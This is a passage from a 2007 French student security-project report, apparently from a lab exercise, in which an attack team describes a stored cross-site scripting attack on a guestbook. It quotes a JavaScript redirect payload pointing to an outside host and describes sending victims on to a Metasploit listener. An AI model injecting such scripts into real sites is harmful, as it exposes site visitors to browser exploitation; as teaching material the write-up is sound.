Objet du rapport / rÃ©union - inetdoc.net

More documents

Recommendations

Info

IUP STRI – M2 2007 Projet Sécurité – Equipe attaque G1 Contrairement à la copie d'écran, dans le champ remarque on introduit le script cité précédemment : window.location='http://jordix.com/attack/'; et on envoie les données modifiées. N.B : dans ce cas on n’avait nullement besoin d’accéder à des champs cachés du formulaire, l’attaque aurait donc aussi fonctionné en insérant directement le code javascript directement dans le formulaire du livre d’or. . Copyright (c) 2007 – GNU Free Documentation licence Équipe Attaque G1 – M2 STRI 44
IUP STRI – M2 2007 Projet Sécurité – Equipe attaque G1 Voici le contenu du champ commentaire dans la base de données : Le script java inséré est celui que l’on a cité précédemment. Cette copie d'écran correspond aux tests réalisés avant l’attaque. Après l’attaque nous n’avons plus eu accès à la base de données. Lorsque le client web de la victime essaye de consulter le livre d’or, son navigateur interprète le javascript et il est redirigé vers la page index.html que l’on a chargé sur le site perso http://www.jordix.com/attack Le message s’affiche, et instantanément le navigateur est redirigé vers l’IP de la machine attaquante procédant au Metasploit en écoute (mais la page actuelle reste affichée) : . Copyright (c) 2007 – GNU Free Documentation licence Équipe Attaque G1 – M2 STRI 45
Page 1 and 2: Romain BERGE Armel DESPOUY Patrice
Page 3 and 4: IUP STRI - M2 2007 Projet Sécurit
Page 43: IUP STRI - M2 2007 Projet Sécurit
Page 87: IUP STRI - M2 2007 Projet Sécurit

Objet du rapport / rÃ©union - inetdoc.net

Create successful ePaper yourself

Delete template?

Save as template?